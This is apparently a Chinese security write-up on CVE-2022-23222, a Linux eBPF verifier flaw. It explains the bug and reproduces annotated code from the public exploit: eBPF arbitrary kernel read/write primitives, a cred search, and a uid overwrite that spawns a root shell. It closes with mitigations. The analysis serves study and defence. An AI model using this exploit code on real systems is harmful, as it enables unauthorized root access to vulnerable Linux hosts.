0x00 背景
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞,漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。
0x01 危害
随着漏洞PoC公开,这个漏洞的利用成本已经无限趋近于0。但是漏洞的利用有前提条件:需要系统允许非特权用户执行BPF程序,而这在大多数发行版中是默认禁止的。同时,由于漏洞是在5.8.0版本内核中引入的,而大多数生产环境并没有使用这么高的内核版本,所以,问题并不算很严重。
0x02 漏洞原理
在写eBPF程序时,对于bpf_map_lookup_elem()返回的结果,一定要判断是否为NULL,否则就会被验证器拒绝加载。这是因为bpf_map_lookup_elem()的返回结果有可能是NULL,这种情况表示没有查找到与key相关的值。如果不进行判断,那么接下来的代码就有可能引用一个空指针,这是非常危险的操作。
那么,验证器是如何知道我们是否判断以及什么时候判断了结果是否为NULL呢?我们来看相关的实现代码。
bpf.h
/* types of values stored in eBPF registers */
/* Pointer types represent:
* pointer
* pointer + imm
* pointer + (u16) var
* pointer + (u16) var + imm
* if (range > 0) then [ptr, ptr + range - off) is safe to access
* if (id > 0) means that some 'var' was added
* if (off > 0) means that 'imm' was added
*
* Every enumerator whose name ends in _OR_NULL is the "may still be NULL"
* counterpart of the pointer type with the same name minus that suffix.
*/
enum bpf_reg_type {
NOT_INIT = 0, /* nothing was written into register */
SCALAR_VALUE, /* reg doesn't contain a valid pointer */
PTR_TO_CTX, /* reg points to bpf_context */
CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
PTR_TO_MAP_VALUE, /* reg points to map element value */
PTR_TO_MAP_VALUE_OR_NULL, /* points to map elem value or NULL */
PTR_TO_STACK, /* reg == frame_pointer + offset */
PTR_TO_PACKET_META, /* skb->data - meta_len */
PTR_TO_PACKET, /* reg points to skb->data */
PTR_TO_PACKET_END, /* skb->data + headlen */
PTR_TO_FLOW_KEYS, /* reg points to bpf_flow_keys */
PTR_TO_SOCKET, /* reg points to struct bpf_sock */
PTR_TO_SOCKET_OR_NULL, /* reg points to struct bpf_sock or NULL */
PTR_TO_SOCK_COMMON, /* reg points to sock_common */
PTR_TO_SOCK_COMMON_OR_NULL, /* reg points to sock_common or NULL */
PTR_TO_TCP_SOCK, /* reg points to struct tcp_sock */
PTR_TO_TCP_SOCK_OR_NULL, /* reg points to struct tcp_sock or NULL */
PTR_TO_TP_BUFFER, /* reg points to a writable raw tp's buffer */
PTR_TO_XDP_SOCK, /* reg points to struct xdp_sock */
/* PTR_TO_BTF_ID points to a kernel struct that does not need
* to be null checked by the BPF program. This does not imply the
* pointer is _not_ null and in practice this can easily be a null
* pointer when reading pointer chains. The assumption is program
* context will handle null pointer dereference typically via fault
* handling. The verifier must keep this in mind and can make no
* assumptions about null or non-null when doing branch analysis.
* Further, when passed into helpers the helpers can not, without
* additional context, assume the value is non-null.
*/
PTR_TO_BTF_ID,
/* PTR_TO_BTF_ID_OR_NULL points to a kernel struct that has not
* been checked for null. Used primarily to inform the verifier
* an explicit null check is required for this struct.
*/
PTR_TO_BTF_ID_OR_NULL,
PTR_TO_MEM, /* reg points to valid memory region */
PTR_TO_MEM_OR_NULL, /* reg points to valid memory region or NULL */
PTR_TO_RDONLY_BUF, /* reg points to a readonly buffer */
PTR_TO_RDONLY_BUF_OR_NULL, /* reg points to a readonly buffer or NULL */
PTR_TO_RDWR_BUF, /* reg points to a read/write buffer */
PTR_TO_RDWR_BUF_OR_NULL, /* reg points to a read/write buffer or NULL */
PTR_TO_PERCPU_BTF_ID, /* reg points to a percpu kernel variable */
};
通过代码我们可知,验证器通过“*_OR_NULL”类型来表示一个未经NULL判断的指针类型。当寄存器的类型是“*_OR_NULL”时,它只能进行非常有限的操作。只有当类型为“*_OR_NULL”的寄存器做完NULL比较后,才可能变为普通的指针,也就是“PTR_TO_*”类型。
出现漏洞的代码位于 linux/kernel/bpf/verifier.c
漏洞部分如下:
/* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
* Caller should also handle BPF_MOV case separately.
* If we return -EACCES, caller may want to try again treating pointer as a
* scalar. So we only emit a diagnostic if !env->allow_ptr_leaks.
*
* NOTE(review): this is an abridged excerpt; the "..." lines stand for code
* that is not shown. dst, known, smin_val and opcode are presumably set up
* in the elided part.
*/
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
const struct bpf_reg_state *ptr_reg,
const struct bpf_reg_state *off_reg)
{
...
/* Reject the pointer types on which arithmetic is prohibited.
* Any type without a case label reaches `default` and is let through.
* Of the *_OR_NULL members of enum bpf_reg_type, PTR_TO_BTF_ID_OR_NULL,
* PTR_TO_MEM_OR_NULL, PTR_TO_RDONLY_BUF_OR_NULL and
* PTR_TO_RDWR_BUF_OR_NULL have no case label in this switch.
*/
switch (ptr_reg->type) {
case PTR_TO_MAP_VALUE_OR_NULL:
/* The only rejection whose message asks for a null check first. */
verbose(env, "R%d pointer arithmetic on %s prohibited, null-check it first\n",
dst, reg_type_str[ptr_reg->type]);
return -EACCES;
case CONST_PTR_TO_MAP:
/* smin_val represents the known value */
/* Adding a known constant 0 is allowed; anything else is rejected below. */
if (known && smin_val == 0 && opcode == BPF_ADD)
break;
fallthrough;
case PTR_TO_PACKET_END:
case PTR_TO_SOCKET:
case PTR_TO_SOCKET_OR_NULL:
case PTR_TO_SOCK_COMMON:
case PTR_TO_SOCK_COMMON_OR_NULL:
case PTR_TO_TCP_SOCK:
case PTR_TO_TCP_SOCK_OR_NULL:
case PTR_TO_XDP_SOCK:
verbose(env, "R%d pointer arithmetic on %s prohibited\n",
dst, reg_type_str[ptr_reg->type]);
return -EACCES;
default:
/* Every pointer type not listed above is accepted here. */
break;
}
...
return 0;
}
其中adjust_ptr_min_max_vals()是eBPF验证器用于检验指针加减运算的函数。这段代码使用switch来过滤不支持加减运算的指针类型,比如各种“*_OR_NULL”类型。但是这段代码里却少了很多类型的判断。这意味着,我们可以对这些没有被过滤的类型做加减运算,其中就包括一部分“*_OR_NULL”类型。
0x03 EXP
公开的Poc写的很规范,利用过程结构非常明确,具体如下:
phase_t phases[] = {
{ .name = "create bpf map(s)", .func = create_bpf_maps },
{ .name = "do some leak", .func = do_leak },
{ .name = "prepare arbitrary rw", .func = prepare_arbitrary_rw },
{ .name = "spawn processes", .func = spawn_processes },
{ .name = "find cred (slow)", .func = find_cred },
{ .name = "overwrite cred", .func = overwrite_cred },
{ .name = "spawn root shell", .func = spawn_root_shell },
{ .name = "clean up the mess", .func = clean_up , .ignore_error = 1 },
};
大致流程如下:
首先构造一个bpf map并利用漏洞泄露array_map的地址,然后构造任意内存地址读写原语。
紧接着,创建用于提权的进程,查找其task_struct结构并取得其中的cred指针,对cred结构中的uid,gid,euid,egid进行覆盖,最后唤醒子进程创建root shell。
接下来以注释的方式仔细分析其中的关键部分:
内核任意内存读取原语:
// r9 = r1
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),
/*
* On entry r1 holds the BPF program's argument. Keep a copy in r9,
* because r1 is reused for the helper calls below.
* NOTE(review): the original note describes this argument as an array of
* pointers whose first two elements are the addresses to read. r9 is later
* passed as the first argument of bpf_skb_load_bytes_relative, so it is
* presumably the skb context whose payload carries those addresses -
* confirm against the loader.
*/
// r0 = bpf_map_lookup_elem(ctx->comm_fd, &key), key bytes zeroed on the stack
BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
/*
* r0 now refers to the looked-up element of the ctx->comm_fd map
* (or is NULL, which is handled next).
*/
// if (r0 == NULL) exit(1)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_MOV64_IMM(BPF_REG_0, 1),
BPF_EXIT_INSN(),
// r8 = r0
BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),
/*
* Keep the pointer to the ctx->comm_fd map element in r8.
*/
// r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
BPF_MOV64_IMM(BPF_REG_3, 0x00),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
/*
* Call bpf_ringbuf_reserve.
* According to the original analysis this reservation always returns NULL
* at run time, which yields a register typed *_OR_NULL whose value is 0.
*/
BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),
/*
* Copy the *_OR_NULL pointer from r0 into r1, then add 1 to r1.
* No NULL check has been done yet, so neither r0 nor r1 should be
* allowed in arithmetic; r1 + 1 is accepted only because of the bug.
* At run time: r0 == 0, r1 == 1.
*/
// if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
BPF_MOV64_IMM(BPF_REG_2, 1),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
BPF_MOV64_IMM(BPF_REG_0, 2),
BPF_EXIT_INSN(),
/*
* NULL check on r0.
* At run time r0 is always NULL, so the jump is taken,
* but r1 is still 1.
*/
// verifier believes r0 = 0 and r1 = 0. However, r0 = 0 and r1 = 1 at run time.
// r7 = (r1 + 1) * 8
BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 1),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 8),
/*
* At run time r7 == 16.
*/
// verifier believes r7 = 8, but r7 = 16 actually.
// store the array pointer
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),// *(u64 *)(r10 - 8) = r8 (pointer to the ctx->comm_fd map element)
/*
* Spill the map element pointer to the stack slot at r10 - 8.
*/
/*
* Stack layout at this point:
*|r10+08| |
*| r10 | |
*|r10-08|pointer to ctx->comm_fd map element|
*|r10-16| |
*/
// overwrite array pointer on stack
// r0 = bpf_skb_load_bytes_relative(r9, 0, r10 - 16, r7, 1)
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),// r3 = r10 (frame pointer)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),// r3 = r10 - 16 (destination buffer)
BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),// r4 = r7: length, 8 for the verifier but 16 at run time
BPF_MOV64_IMM(BPF_REG_5, 1),// r5 = 1, so the call is (r9, 0, r10 - 16, r7, 1)
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),
/*
* r0 = bpf_skb_load_bytes_relative(r9, 0, r10 - 16, 16, 1)
* The verifier expects 8 bytes written to [r10-16, r10-8); the 16 bytes
* actually copied also overwrite the slot at r10 - 8.
* Stack layout afterwards:
*|r10+08| |
*| r10 | |
*|r10-08|addr[1]|
*|r10-16|addr[0]|
*/
// fetch our arbitrary address pointer
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
/*
* r6 = addr[1]
* r6 now holds the address to read from, while the verifier still
* treats the slot as the spilled map element pointer.
*/
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, 0),
/*
* r0 = *addr[1]
* r0 now holds the 8 bytes stored at the target address.
*/
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0),
/*
* Store the result to the memory r8 points to,
* i.e. the ctx->comm_fd map element.
*/
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
内核任意内存写入原语:
/*
* The part identical to the read primitive is omitted here.
* Stack layout at this point:
*|r10+08| |
*| r10 | |
*|r10-08|addr[1]|
*|r10-16|addr[0]|
*/
// fetch our arbitrary address pointer
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
/*
* r6 = addr[1]
* r6 now holds the address to write to.
*/
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),
/*
* r0 = first qword of the ctx->comm_fd map element (selects the store width)
*/
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 8),
/*
* r1 = second qword of the ctx->comm_fd map element (the value to write)
*/
// if (r0 == 0) { *(u64*)r6 = r1 }
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0),
BPF_JMP_IMM(BPF_JA, 0, 0, 1),
// else { *(u32*)r6 = r1 }
BPF_STX_MEM(BPF_W, BPF_REG_6, BPF_REG_1, 0),
/*
* The value is written to the target address with the width chosen by r0:
* 8 bytes when r0 == 0, otherwise 4 bytes.
*/
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
提权过程:
int spawn_processes(context_t *ctx)
{
for (int i = 0; i < PROC_NUM; i++)
{
pid_t child = fork();
if (child == 0) {
if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
WARNF("Could not set name");
}
uid_t old = getuid();
kill(getpid(), SIGSTOP);
uid_t uid = getuid();
if (uid == 0 && old != uid) {
OKF("Enjoy root!");
system("/bin/sh");
}
exit(uid);
}
if (child < 0) {
return child;
}
ctx->processes[i] = child;
}
return 0;
}
首先fork一个子进程,在子进程中设置线程名为特定字符串并记录uid后暂停自己。等待被唤醒后,子进程检查当前uid,如果提权成功则执行一个shell。
而父进程将在记录子进程pid后继续执行find_cred。
/*
 * Scan kernel memory for the __ID__ marker and recover a cred pointer.
 *
 * Starting at ctx->array_map + PAGE_SIZE, reads PAGE_SIZE*PAGE_SIZE
 * consecutive 8-byte values through arbitrary_read() and compares each with
 * the first sizeof(u64) bytes of __ID__. On a match, the two qwords located
 * 0x10 bytes before the match are treated as candidate cred pointers: the
 * one at +8 is tried first, and the one at +0 only if the first is zero.
 * NOTE(review): this presumably relies on task_struct placing its two cred
 * pointers directly before the comm field - confirm for the target kernel.
 *
 * On success stores the pointer in ctx->cred and returns 0.
 * Returns -1 if a read fails or no usable match is found.
 */
int find_cred(context_t *ctx)
{
    for (int i = 0; i < PAGE_SIZE*PAGE_SIZE ; i++)
    {
        u64 val = 0;
        kaddr_t addr = ctx->array_map + PAGE_SIZE + i*0x8;

        if (arbitrary_read(ctx, addr, &val, BPF_DW) != 0) {
            WARNF("Could not read kernel address %p", addr);
            return -1;
        }

        if (memcmp(&val, __ID__, sizeof(val)) == 0) {
            kaddr_t cred_from_task = addr - 0x10;

            /* Try the pointer stored at +8 first. */
            if (arbitrary_read(ctx, cred_from_task + 8, &val, BPF_DW) != 0) {
                WARNF("Could not read kernel address %p + 8", cred_from_task);
                return -1;
            }

            /* Fall back to the pointer at +0 only when the first one is zero. */
            if (val == 0 && arbitrary_read(ctx, cred_from_task, &val, BPF_DW) != 0) {
                WARNF("Could not read kernel address %p + 0", cred_from_task);
                return -1;
            }

            if (val != 0) {
                ctx->cred = (kaddr_t)val;
                DEBUGF("task struct ~ %p", cred_from_task);
                DEBUGF("cred @ %p", ctx->cred);
                /* The argument is a pointer, so it needs %p and a void * cast
                 * (the original used %d, a format/argument mismatch). */
                DEBUGF("cred is %p", (void *)&(ctx->cred));
                return 0;
            }
            /* Both candidates were zero: keep scanning. */
        }
    }

    return -1;
}
父进程在find_cred函数中使用了暴力搜索内存的方式,搜索子进程设置的线程名称,试图定位内核中task_struct的关键地址,并从中取得cred指针。一旦查找到关键地址,接下来会调用overwrite_cred函数覆盖cred结构中的uid,gid,euid,egid,从而实现提权。完成提权后,父进程向子进程发送唤醒信号并等待,子进程继续执行便会生成一个root权限的shell。
/*
 * Write 0 (as a BPF_W-sized value) to the uid, gid, euid and egid fields of
 * the structure at ctx->cred, in that order, using arbitrary_write().
 *
 * Returns 0 when all four writes succeed; returns -1 at the first failing
 * write, without attempting the remaining ones.
 */
int overwrite_cred(context_t *ctx)
{
    /* Short-circuit evaluation keeps the original order and early exit. */
    if (arbitrary_write(ctx, ctx->cred + OFFSET_uid_from_cred, 0, BPF_W) != 0 ||
        arbitrary_write(ctx, ctx->cred + OFFSET_gid_from_cred, 0, BPF_W) != 0 ||
        arbitrary_write(ctx, ctx->cred + OFFSET_euid_from_cred, 0, BPF_W) != 0 ||
        arbitrary_write(ctx, ctx->cred + OFFSET_egid_from_cred, 0, BPF_W) != 0) {
        return -1;
    }

    return 0;
}
/*
 * Send SIGCONT to every pid recorded in ctx->processes, then block until
 * wait() stops returning a positive pid. Always returns 0.
 */
int spawn_root_shell(context_t *ctx)
{
    int slot = 0;

    while (slot < PROC_NUM) {
        kill(ctx->processes[slot], SIGCONT);
        slot++;
    }

    /* Reap children until none are left (or wait() fails). */
    for (;;) {
        if (wait(NULL) <= 0) {
            break;
        }
    }

    return 0;
}
0x04 总结
此漏洞本质上是eBPF验证器过滤不严,导致验证器的逻辑与实际执行时不一致,从而突破了验证器的安全检查,并最终导致内核任意内存读写。而提权的方法也不只有公开的exp一种,甚至完全可以利用漏洞构造出内核shellcode执行。
从这方面看来,漏洞还是很严重的,不过由于此漏洞利用需要允许非特权用户执行eBPF代码,而大多数发行版默认并不开启此功能,此漏洞的危害终究有限。
0x05 防范
升级内核到安全版本
禁止非特权用户执行eBPF程序,命令如下:
sudo sysctl kernel.unprivileged_bpf_disabled=1
0x06 参考资料
https://www.openwall.com/lists/oss-security/2022/01/14/1
https://github.com/tr3ee/CVE-2022-23222
https://github.com/torvalds/linux